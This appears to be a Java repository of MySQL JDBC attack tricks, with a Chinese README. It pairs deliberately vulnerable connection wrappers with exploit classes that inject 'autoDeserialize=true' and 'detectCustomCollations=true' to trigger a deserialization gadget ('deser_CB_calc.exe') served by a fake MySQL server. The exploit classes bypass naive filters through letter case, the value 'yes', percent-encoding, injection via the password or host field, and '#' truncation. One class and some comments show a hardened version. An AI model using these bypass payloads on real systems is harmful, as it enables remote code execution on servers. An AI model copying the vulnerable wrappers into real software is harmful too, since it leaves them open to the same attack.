├── .gitignore ├── README.md ├── pom.xml └── src └── main └── java └── org └── y4sec └── team ├── app ├── Application1.java ├── Application10.java ├── Application2.java ├── Application3.java ├── Application4.java ├── Application5.java ├── Application6.java ├── Application7.java ├── Application8.java └── Application9.java └── exploit ├── Example1.java ├── Example10.java ├── Example2.java ├── Example3.java ├── Example4.java ├── Example5.java ├── Example6.java ├── Example7.java ├── Example7Bypass.java ├── Example8.java ├── Example8Bypass.java ├── Example9.java └── Example9Bypass.java /.gitignore: -------------------------------------------------------------------------------- 1 | target/ 2 | !.mvn/wrapper/maven-wrapper.jar 3 | !**/src/main/**/target/ 4 | !**/src/test/**/target/ 5 | 6 | ### IntelliJ IDEA ### 7 | .idea/modules.xml 8 | .idea/jarRepositories.xml 9 | .idea/compiler.xml 10 | .idea/libraries/ 11 | *.iws 12 | *.iml 13 | *.ipr 14 | 15 | ### Eclipse ### 16 | .apt_generated 17 | .classpath 18 | .factorypath 19 | .project 20 | .settings 21 | .springBeans 22 | .sts4-cache 23 | 24 | ### NetBeans ### 25 | /nbproject/private/ 26 | /nbbuild/ 27 | /dist/ 28 | /nbdist/ 29 | /.nb-gradle/ 30 | build/ 31 | !**/src/main/**/build/ 32 | !**/src/test/**/build/ 33 | 34 | ### VS Code ### 35 | .vscode/ 36 | 37 | ### Mac OS ### 38 | .DS_Store 39 | 40 | .idea/ -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## mysql-jdbc-tricks 2 | 3 | 这里是很多`MySQL JDBC Attack`的小技巧,我仅在`MySQL`的`JDBC`驱动中测试,这里的技巧可能在其他类型的数据库驱动中也存在 4 | 5 | 文章:https://mp.weixin.qq.com/s/lmoWKK41ZQzZOh-P26VUng 6 | 7 | 推荐搭建:推荐配合 https://github.com/4ra1n/mysql-fake-server 使用 8 | 9 | ### 基本示例 10 | 11 | 参考`Application1`和`Example1`代码 12 | 13 | 这是一个不存在任何过滤的情况,直接执行即可`RCE` 14 | 15 | ### 大小写绕过 16 | 17 | 参考`Application1`和`Example1`代码 18 | 19 | 这里展示了一种简单的防护和绕过,`MySQL`驱动对于连接参数的大小不做限制,如果开发者不做大小写限制,将会被轻易饶过 20 
| 21 | ### YES绕过 22 | 23 | 参考`Application3`和`Example3`代码 24 | 25 | 这里展示了一种简单的防护和绕过,`MySQL`驱动允许的`Bool`值是包含`true/yes`两种的,因此存在一种绕过 26 | 27 | ### 编码绕过 28 | 29 | 参考`Application4`和`Example4`代码 30 | 31 | 这里展示了某些情况下的绕过,`MySQL`驱动允许`URL`编码,因此如果开发者没有按照标准`URL`解析和过滤,将会存在绕过 32 | 33 | ### 暂时的安全 34 | 35 | 参考`Application5`和`Example5`代码 36 | 37 | 对于这种情况,似乎是安全了,或许有其他的绕过? 38 | 39 | ### 另一种形式的传参 40 | 41 | 参考`Application6`和`Example6`代码 42 | 43 | 这也是`JDBC`攻击很常见的一种情况 44 | 45 | ### 额外参数检查绕过 46 | 47 | 参考`Application7`和`Example7Bypass`代码 48 | 49 | 限制额外连接参数情况下如何绕过 50 | 51 | ### 特殊情况下的#号绕过 52 | 53 | 参考`Application8`和`Example8Bypass`代码 54 | 55 | 一种特殊情况的绕过,属于一种逻辑漏洞 56 | 57 | ### 另一种特殊场景的绕过 58 | 59 | 参考`Application9`和`Example9Bypass`代码 60 | 61 | 另一种特殊情况的绕过,开发者忽略某些参数过滤导致的绕过 62 | 63 | ### 可能安全 64 | 65 | 参考`Application10`和`Example10`代码 66 | 67 | 对于这种情况,似乎是安全了,或许有其他的绕过? 68 | -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.y4sec 8 | mysql-jdbc-tricks 9 | 1.0 10 | 11 | 12 | 8 13 | 8 14 | UTF-8 15 | 16 | 17 | 18 | 19 | mysql 20 | mysql-connector-java 21 | 6.0.2 22 | 23 | 24 | commons-beanutils 25 | commons-beanutils 26 | 1.9.4 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/app/Application1.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.app; 2 | 3 | import java.sql.DriverManager; 4 | 5 | public class Application1 { 6 | public static void connection(String url){ 7 | try { 8 | Class.forName("com.mysql.cj.jdbc.Driver"); 9 | DriverManager.getConnection(url); 10 | } catch (Exception e) { 11 | e.printStackTrace(); 12 | } 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/app/Application10.java: 
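--------------------------------------------------------------------------------
package org.y4sec.team.app;

import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.sql.DriverManager;
import java.util.Locale;
import java.util.Properties;
import java.util.regex.Pattern;

/**
 * Builds a MySQL JDBC connection from five caller-supplied pieces.
 * <p>
 * Only {@code addr} and {@code db} are placed in the URL, and both are restricted to characters that
 * cannot introduce URL syntax ({@code / ? & # =}). Credentials and any extra connection properties
 * travel in a {@link Properties} object rather than the URL, so a value can never break out of its own
 * parameter. Every property key taken from {@code extra} is percent-decoded and compared
 * case-insensitively against the blocked name before it is accepted.
 */
public class Application10 {
    /** host[:port]; hostname / IPv4 characters, or a bracketed IPv6 literal. */
    private static final Pattern ADDR = Pattern.compile("(\\[[0-9A-Fa-f:.]+\\]|[A-Za-z0-9.-]+)(:[0-9]{1,5})?");
    /** Database name: identifier characters only. */
    private static final Pattern DB_NAME = Pattern.compile("[A-Za-z0-9_]+");
    /** Connection-property key, after percent-decoding: letters and digits only. */
    private static final Pattern PROPERTY_KEY = Pattern.compile("[A-Za-z0-9]+");
    /** Property name that must never be reachable from caller input (compared lower-cased). */
    private static final String BLOCKED_PROPERTY = "autodeserialize";

    /**
     * Opens a connection to {@code addr}/{@code db}.
     *
     * @param addr     host or host:port; rejected unless it matches {@link #ADDR}
     * @param user     login user, passed as a connection property, never in the URL
     * @param db       database name; rejected unless it matches {@link #DB_NAME}
     * @param password login password, passed as a connection property and never printed
     * @param extra    optional {@code key=value&key2=value2} connection properties; may be empty or null
     */
    public static void connection(String addr, String user, String db, String password, String extra) {
        try {
            // addr and db are validated structurally, so the URL can only ever be "jdbc:mysql://host[:port]/db".
            String url = "jdbc:mysql://" + requireMatch(ADDR, addr, "addr") + "/" + requireMatch(DB_NAME, db, "db");

            Properties props = parseExtra(extra);
            // Credentials are set last so nothing in `extra` can override them.
            props.setProperty("user", check(user));
            props.setProperty("password", check(password));

            check(url); // belt and braces: the URL holds nothing but the validated addr and db

            // Safe to print: the URL carries no credentials and no properties.
            System.out.println(url);

            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url, props);
        } catch (Exception e) {
            // Consistent with the rest of this demo: rejections and connection failures are only printed.
            e.printStackTrace();
        }
    }

    /**
     * Splits {@code extra} into connection properties, rejecting any key that is malformed or blocked.
     * Keys and values are percent-decoded here because they no longer pass through the URL; whether
     * that matches the decoding the driver in pom.xml applies to query values should be confirmed.
     *
     * @param extra {@code k=v&k2=v2} text, possibly null or empty
     * @return the parsed properties (empty when {@code extra} is null or empty)
     * @throws IllegalArgumentException when a key is not alphanumeric or a percent-escape is malformed
     * @throws RuntimeException         when a key names the blocked property
     */
    private static Properties parseExtra(String extra) {
        Properties props = new Properties();
        if (extra == null || extra.isEmpty()) {
            return props;
        }
        for (String pair : extra.split("&")) {
            if (pair.isEmpty()) {
                continue; // tolerate a leading, trailing or doubled '&'
            }
            int eq = pair.indexOf('=');
            String key = decode(eq < 0 ? pair : pair.substring(0, eq));
            String value = eq < 0 ? "" : decode(pair.substring(eq + 1));
            if (!PROPERTY_KEY.matcher(key).matches()) {
                throw new IllegalArgumentException("invalid property key in extra");
            }
            props.setProperty(check(key), value);
        }
        return props;
    }

    /** Returns {@code value} when it fully matches {@code allowed}; otherwise rejects it by name. */
    private static String requireMatch(Pattern allowed, String value, String name) {
        if (value == null || !allowed.matcher(value).matches()) {
            throw new IllegalArgumentException("invalid " + name);
        }
        return value;
    }

    /** Percent-decodes {@code s} as UTF-8; malformed escapes surface as IllegalArgumentException. */
    private static String decode(String s) {
        try {
            return URLDecoder.decode(s, StandardCharsets.UTF_8.name());
        } catch (UnsupportedEncodingException e) {
            throw new IllegalStateException("UTF-8 is always available", e); // cannot happen on a conforming JVM
        }
    }

    /**
     * Rejects input that contains the blocked property name. The comparison is made on the
     * percent-decoded, lower-cased form so that neither encoding nor letter case can hide the name.
     *
     * @param params a single value or property key
     * @return {@code params} unchanged when it is acceptable
     * @throws RuntimeException when the blocked property name is present
     */
    private static String check(String params) {
        String normalized = decode(params).toLowerCase(Locale.ROOT);
        if (normalized.contains(BLOCKED_PROPERTY)) {
            throw new RuntimeException("you are hacker");
        }
        return params;
    }
}
-------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/app/Application2.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.app; 2 | 3 | import java.net.URI; 4 | import java.sql.DriverManager; 5 | import java.util.HashMap; 6 | import java.util.Map; 7 | 8 | public class Application2 { 9 | public static void connection(String url){ 10 | try { 11 | if(!check(url)) { 12 | System.out.println("you are hacker"); 13 | return; 14 | } 15 | Class.forName("com.mysql.cj.jdbc.Driver"); 16 | DriverManager.getConnection(url); 17 | } catch (Exception e) { 18 | e.printStackTrace(); 19 | } 20 | } 21 | 22 | private static boolean check(String jdbcUrl){ 23 | try { 24 | Map params = new HashMap<>(); 25 | String query = jdbcUrl.split("\\?")[1]; 26 | if (query != null) { 27 | String[] pairs = 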
query.split("&"); 28 | for (String pair : pairs) { 29 | String[] keyValue = pair.split("="); 30 | String key = keyValue[0]; 31 | String value = keyValue.length > 1 ? keyValue[1] : ""; 32 | params.put(key, value); 33 | } 34 | } 35 | 36 | System.out.println("Params: " + params); 37 | 38 | for (Map.Entry p: params.entrySet()){ 39 | if (p.getKey().equals("autoDeserialize")) { 40 | if(p.getValue().equals("true")){ 41 | return false; 42 | } 43 | } 44 | } 45 | 46 | return true; 47 | } catch (Exception e) { 48 | e.printStackTrace(); 49 | return false; 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/app/Application3.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.app; 2 | 3 | import java.net.URI; 4 | import java.sql.DriverManager; 5 | import java.util.HashMap; 6 | import java.util.Map; 7 | 8 | public class Application3 { 9 | public static void connection(String url){ 10 | try { 11 | if(!check(url)) { 12 | System.out.println("you are hacker"); 13 | return; 14 | } 15 | Class.forName("com.mysql.cj.jdbc.Driver"); 16 | DriverManager.getConnection(url); 17 | } catch (Exception e) { 18 | e.printStackTrace(); 19 | } 20 | } 21 | 22 | private static boolean check(String jdbcUrl){ 23 | try { 24 | Map params = new HashMap<>(); 25 | String query = jdbcUrl.split("\\?")[1]; 26 | if (query != null) { 27 | String[] pairs = query.split("&"); 28 | for (String pair : pairs) { 29 | String[] keyValue = pair.split("="); 30 | String key = keyValue[0]; 31 | String value = keyValue.length > 1 ? 
keyValue[1] : ""; 32 | params.put(key, value); 33 | } 34 | } 35 | 36 | System.out.println("Params: " + params); 37 | 38 | for (Map.Entry p: params.entrySet()){ 39 | if (p.getKey().equals("autoDeserialize")) { 40 | String value = p.getValue(); 41 | value = value.toLowerCase(); 42 | if(value.equals("true")){ 43 | return false; 44 | } 45 | } 46 | } 47 | 48 | return true; 49 | } catch (Exception e) { 50 | e.printStackTrace(); 51 | return false; 52 | } 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/app/Application4.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.app; 2 | 3 | import java.net.URI; 4 | import java.sql.DriverManager; 5 | import java.util.HashMap; 6 | import java.util.Map; 7 | 8 | public class Application4 { 9 | public static void connection(String url) { 10 | try { 11 | if (!check(url)) { 12 | System.out.println("you are hacker"); 13 | return; 14 | } 15 | Class.forName("com.mysql.cj.jdbc.Driver"); 16 | DriverManager.getConnection(url); 17 | } catch (Exception e) { 18 | e.printStackTrace(); 19 | } 20 | } 21 | 22 | private static boolean check(String jdbcUrl) { 23 | try { 24 | Map params = new HashMap<>(); 25 | String query = jdbcUrl.split("\\?")[1]; 26 | if (query != null) { 27 | String[] pairs = query.split("&"); 28 | for (String pair : pairs) { 29 | String[] keyValue = pair.split("="); 30 | String key = keyValue[0]; 31 | String value = keyValue.length > 1 ? 
keyValue[1] : ""; 32 | params.put(key, value); 33 | } 34 | } 35 | 36 | System.out.println("Params: " + params); 37 | 38 | for (Map.Entry p : params.entrySet()) { 39 | if (p.getKey().equals("autoDeserialize")) { 40 | String value = p.getValue(); 41 | value = value.toLowerCase(); 42 | if (value.equals("true") || value.equals("yes")) { 43 | return false; 44 | } 45 | } 46 | } 47 | 48 | return true; 49 | } catch (Exception e) { 50 | e.printStackTrace(); 51 | return false; 52 | } 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/app/Application5.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.app; 2 | 3 | import java.net.URI; 4 | import java.sql.DriverManager; 5 | import java.util.HashMap; 6 | import java.util.Map; 7 | 8 | public class Application5 { 9 | public static void connection(String url) { 10 | try { 11 | if (!check(url)) { 12 | System.out.println("you are hacker"); 13 | return; 14 | } 15 | Class.forName("com.mysql.cj.jdbc.Driver"); 16 | DriverManager.getConnection(url); 17 | } catch (Exception e) { 18 | e.printStackTrace(); 19 | } 20 | } 21 | 22 | private static boolean check(String jdbcUrl) { 23 | try { 24 | URI uri = new URI(jdbcUrl.replace("jdbc:", "")); 25 | 26 | String host = uri.getHost(); 27 | int port = uri.getPort(); 28 | String path = uri.getPath(); 29 | String dbname = path.substring(1); 30 | 31 | Map params = new HashMap<>(); 32 | String query = uri.getQuery(); 33 | if (query != null) { 34 | String[] pairs = query.split("&"); 35 | for (String pair : pairs) { 36 | String[] keyValue = pair.split("="); 37 | String key = keyValue[0]; 38 | String value = keyValue.length > 1 ? 
keyValue[1] : ""; 39 | params.put(key, value); 40 | } 41 | } 42 | 43 | System.out.println("Host: " + host); 44 | System.out.println("Port: " + port); 45 | System.out.println("DB Name: " + dbname); 46 | System.out.println("Params: " + params); 47 | 48 | for (Map.Entry p : params.entrySet()) { 49 | if (p.getKey().equals("autoDeserialize")) { 50 | String value = p.getValue(); 51 | value = value.toLowerCase(); 52 | if (value.equals("true") || value.equals("yes")) { 53 | return false; 54 | } 55 | } 56 | } 57 | 58 | return true; 59 | } catch (Exception e) { 60 | e.printStackTrace(); 61 | return false; 62 | } 63 | } 64 | } 65 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/app/Application6.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.app; 2 | 3 | import java.net.URLDecoder; 4 | import java.sql.DriverManager; 5 | 6 | public class Application6 { 7 | public static void connection(String addr,String user,String db,String password,String extra) { 8 | try { 9 | String url = String.format("jdbc:mysql://%s/%s?",addr,db); 10 | 11 | StringBuilder sb = new StringBuilder(); 12 | sb.append("user="); 13 | sb.append(user); 14 | sb.append("&"); 15 | sb.append("password="); 16 | sb.append(password); 17 | if (!extra.equals("")){ 18 | sb.append("&"); 19 | sb.append(extra); 20 | } 21 | 22 | url = url + sb; 23 | 24 | Class.forName("com.mysql.cj.jdbc.Driver"); 25 | DriverManager.getConnection(url); 26 | } catch (Exception e) { 27 | e.printStackTrace(); 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/app/Application7.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.app; 2 | 3 | import java.sql.DriverManager; 4 | import java.util.HashMap; 5 | import java.util.Map; 6 | 7 | public class Application7 { 8 | public 
static void connection(String addr,String user,String db,String password,String extra) { 9 | try { 10 | String url = String.format("jdbc:mysql://%s/%s?",addr,db); 11 | 12 | StringBuilder sb = new StringBuilder(); 13 | sb.append("user="); 14 | sb.append(user); 15 | sb.append("&"); 16 | sb.append("password="); 17 | sb.append(password); 18 | 19 | if (!check(extra)){ 20 | System.out.println("you are hacker"); 21 | return; 22 | } 23 | 24 | if (!extra.equals("")){ 25 | sb.append("&"); 26 | sb.append(extra); 27 | } 28 | 29 | url = url + sb; 30 | 31 | System.out.println(url); 32 | 33 | Class.forName("com.mysql.cj.jdbc.Driver"); 34 | DriverManager.getConnection(url); 35 | } catch (Exception e) { 36 | e.printStackTrace(); 37 | } 38 | } 39 | 40 | private static boolean check(String params){ 41 | try { 42 | return !params.contains("autoDeserialize"); 43 | } catch (Exception e) { 44 | e.printStackTrace(); 45 | return false; 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/app/Application8.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.app; 2 | 3 | import java.sql.DriverManager; 4 | 5 | public class Application8 { 6 | public static void connection(String addr, String user, String db, String password, String extra) { 7 | try { 8 | String url = String.format("jdbc:mysql://%s/%s?", addr, db); 9 | 10 | StringBuilder sb = new StringBuilder(); 11 | sb.append("user="); 12 | sb.append(user); 13 | sb.append("&"); 14 | sb.append("password="); 15 | sb.append(password); 16 | 17 | if (!check(extra)) { 18 | System.out.println("you are hacker"); 19 | return; 20 | } 21 | 22 | if (!extra.equals("")) { 23 | sb.append("&"); 24 | sb.append(extra); 25 | } 26 | 27 | if (url.endsWith("?")) { 28 | url = url + sb + "autoDeserialize=false"; 29 | } else { 30 | url = url + sb + "&autoDeserialize=false"; 31 | } 32 | 33 | System.out.println(url); 34 | 35 | 
Class.forName("com.mysql.cj.jdbc.Driver"); 36 | DriverManager.getConnection(url); 37 | } catch (Exception e) { 38 | e.printStackTrace(); 39 | } 40 | } 41 | 42 | private static boolean check(String params) { 43 | try { 44 | return !params.contains("autoDeserialize"); 45 | } catch (Exception e) { 46 | e.printStackTrace(); 47 | return false; 48 | } 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/app/Application9.java: --------------------------------------------------------------------------------
package org.y4sec.team.app;

import java.sql.DriverManager;

/**
 * Demo: filtering applied per input, but only to three of the five inputs.
 * <p>
 * {@code user}, {@code password} and {@code extra} go through {@link #check(String)}; {@code addr} and
 * {@code db} are formatted straight into the URL without it. Because the URL is assembled by string
 * concatenation, URL syntax inside those two inputs becomes part of the connection string the driver
 * parses, so the blocked property name can still reach the driver that way (the README describes this
 * case as the developer skipping the filter on some parameters; see Example9Bypass).
 * <p>
 * Mitigation: validate {@code addr} and {@code db} against strict host[:port] / identifier patterns,
 * and hand credentials and connection properties to
 * {@code DriverManager.getConnection(url, Properties)} instead of embedding them in the URL.
 */
public class Application9 {
    /**
     * Opens a connection built from the five caller-supplied pieces.
     *
     * @param addr     host[:port] — NOT passed through {@link #check(String)}
     * @param user     login user — checked
     * @param db       database name — NOT passed through {@link #check(String)}
     * @param password login password — checked, and later printed as part of the URL
     * @param extra    optional {@code k=v&k2=v2} properties appended verbatim — checked
     */
    public static void connection(String addr, String user, String db, String password, String extra) {
        try {
            // addr and db are interpolated unchecked: this is the gap the class demonstrates.
            String url = String.format("jdbc:mysql://%s/%s?", addr, db);

            StringBuilder sb = new StringBuilder();
            sb.append("user=");
            sb.append(check(user));
            sb.append("&");
            sb.append("password=");
            sb.append(check(password));

            // NOTE: extra.equals("") throws NullPointerException for a null extra; the catch below swallows it.
            if (!extra.equals("")) {
                sb.append("&");
                sb.append(check(extra));
            }

            url = url + sb;

            // Prints the complete URL, password included — do not do this outside a demo.
            System.out.println(url);

            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception e) {
            // Any failure, including the "you are hacker" rejection, is only printed, never propagated.
            e.printStackTrace();
        }
    }

    /**
     * Case-sensitive substring deny-list for one property name on the raw, undecoded text.
     * It guards only the inputs it is applied to, and it assumes the driver sees exactly the spelling
     * the caller passed (no percent-decoding or case folding of keys) — confirm that against the
     * driver version declared in pom.xml before relying on it.
     *
     * @param params a single URL-query fragment
     * @return {@code params} unchanged when the name is absent
     * @throws RuntimeException when {@code params} contains {@code autoDeserialize}
     */
    private static String check(String params) {
        if (params.contains("autoDeserialize")) {
            throw new RuntimeException("you are hacker");
        }
        return params;
    }
}
-------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/exploit/Example1.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.exploit; 2 | 3 | import org.y4sec.team.app.Application1; 4 | 5 | public class Example1 { 6 | public static void main(String[] args) { 7 | String addr = "127.0.0.1:62787"; 8 | String params 
= "detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe"; 9 | String url = String.format( "jdbc:mysql://%s/test?%s",addr,params); 10 | 11 | Application1.connection(url); 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/exploit/Example10.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.exploit; 2 | 3 | import org.y4sec.team.app.Application10; 4 | 5 | public class Example10 { 6 | public static void main(String[] args) { 7 | // 可控内容 8 | String addr = "127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#"; 9 | String user = "deser_CB_calc.exe"; 10 | String password = "test"; 11 | String db = "test"; 12 | String extra = ""; 13 | 14 | Application10.connection(addr,user,db,password,extra); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/exploit/Example2.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.exploit; 2 | 3 | import org.y4sec.team.app.Application2; 4 | 5 | public class Example2 { 6 | public static void main(String[] args) { 7 | String addr = "127.0.0.1:62787"; 8 | String params = "detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe"; 9 | String url = String.format("jdbc:mysql://%s/test?%s", addr, params); 10 | 11 | Application2.connection(url); 12 | 13 | addr = "127.0.0.1:62787"; 14 | params = "detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe"; 15 | url = String.format("jdbc:mysql://%s/test?%s", addr, params); 16 | 17 | Application2.connection(url); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/exploit/Example3.java: 
-------------------------------------------------------------------------------- 1 | package org.y4sec.team.exploit; 2 | 3 | import org.y4sec.team.app.Application3; 4 | 5 | public class Example3 { 6 | public static void main(String[] args) { 7 | String addr = "127.0.0.1:62787"; 8 | String params = "detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe"; 9 | String url = String.format("jdbc:mysql://%s/test?%s", addr, params); 10 | 11 | Application3.connection(url); 12 | 13 | addr = "127.0.0.1:62787"; 14 | params = "detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe"; 15 | url = String.format("jdbc:mysql://%s/test?%s", addr, params); 16 | 17 | Application3.connection(url); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/exploit/Example4.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.exploit; 2 | 3 | import org.y4sec.team.app.Application4; 4 | 5 | public class Example4 { 6 | public static void main(String[] args) { 7 | String addr = "127.0.0.1:62787"; 8 | String params = "detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe"; 9 | String url = String.format("jdbc:mysql://%s/test?%s", addr, params); 10 | 11 | Application4.connection(url); 12 | 13 | addr = "127.0.0.1:62787"; 14 | params = "detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe"; 15 | url = String.format("jdbc:mysql://%s/test?%s", addr, params); 16 | 17 | Application4.connection(url); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/exploit/Example5.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.exploit; 2 | 3 | import org.y4sec.team.app.Application5; 4 | 5 | public class Example5 { 6 | public static void main(String[] args) { 7 | 
String addr = "127.0.0.1:62787"; 8 | String params = "detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe"; 9 | String url = String.format("jdbc:mysql://%s/test?%s", addr, params); 10 | 11 | Application5.connection(url); 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/exploit/Example6.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.exploit; 2 | 3 | import org.y4sec.team.app.Application6; 4 | 5 | public class Example6 { 6 | public static void main(String[] args) { 7 | // 可控内容 8 | String addr = "127.0.0.1:62787"; 9 | String user = "deser_CB_calc.exe"; 10 | String password = "test"; 11 | String db = "test"; 12 | String extra = "detectCustomCollations=true&autoDeserialize=true"; 13 | 14 | Application6.connection(addr,user,db,password,extra); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/exploit/Example7.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.exploit; 2 | 3 | import org.y4sec.team.app.Application7; 4 | 5 | public class Example7 { 6 | public static void main(String[] args) { 7 | // 可控内容 8 | String addr = "127.0.0.1:62787"; 9 | String user = "deser_CB_calc.exe"; 10 | String password = "test"; 11 | String db = "test"; 12 | String extra = "detectCustomCollations=true&autoDeserialize=true"; 13 | 14 | Application7.connection(addr,user,db,password,extra); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/exploit/Example7Bypass.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.exploit; 2 | 3 | import org.y4sec.team.app.Application7; 4 | 5 | public class Example7Bypass { 6 | public static void main(String[] 
args) { 7 | // 可控内容 8 | String addr = "127.0.0.1:62787"; 9 | String user = "deser_CB_calc.exe"; 10 | String password = "test&autoDeserialize=true&"; 11 | String db = "test"; 12 | String extra = "detectCustomCollations=true&"; 13 | 14 | Application7.connection(addr,user,db,password,extra); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/exploit/Example8.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.exploit; 2 | 3 | import org.y4sec.team.app.Application8; 4 | 5 | public class Example8 { 6 | public static void main(String[] args) { 7 | // 可控内容 8 | String addr = "127.0.0.1:62787"; 9 | String user = "deser_CB_calc.exe"; 10 | String password = "test&autoDeserialize=true&"; 11 | String db = "test"; 12 | String extra = "detectCustomCollations=true&"; 13 | 14 | Application8.connection(addr,user,db,password,extra); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/exploit/Example8Bypass.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.exploit; 2 | 3 | import org.y4sec.team.app.Application8; 4 | 5 | public class Example8Bypass { 6 | public static void main(String[] args) { 7 | // 可控内容 8 | String addr = "127.0.0.1:62787"; 9 | String user = "deser_CB_calc.exe"; 10 | String password = "test&autoDeserialize=true"; 11 | String db = "test"; 12 | String extra = "detectCustomCollations=true&#?"; 13 | 14 | Application8.connection(addr,user,db,password,extra); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/exploit/Example9.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.exploit; 2 | 3 | import org.y4sec.team.app.Application9; 4 | 5 | public class 
Example9 { 6 | public static void main(String[] args) { 7 | // 可控内容 8 | String addr = "127.0.0.1:62787"; 9 | String user = "deser_CB_calc.exe"; 10 | String password = "test&autoDeserialize=true&"; 11 | String db = "test"; 12 | String extra = "detectCustomCollations=true&"; 13 | 14 | Application9.connection(addr,user,db,password,extra); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /src/main/java/org/y4sec/team/exploit/Example9Bypass.java: -------------------------------------------------------------------------------- 1 | package org.y4sec.team.exploit; 2 | 3 | import org.y4sec.team.app.Application9; 4 | 5 | public class Example9Bypass { 6 | public static void main(String[] args) { 7 | // 可控内容 8 | String addr = "127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#"; 9 | String user = "deser_CB_calc.exe"; 10 | String password = "test"; 11 | String db = "test"; 12 | String extra = ""; 13 | 14 | Application9.connection(addr,user,db,password,extra); 15 | } 16 | } 17 | --------------------------------------------------------------------------------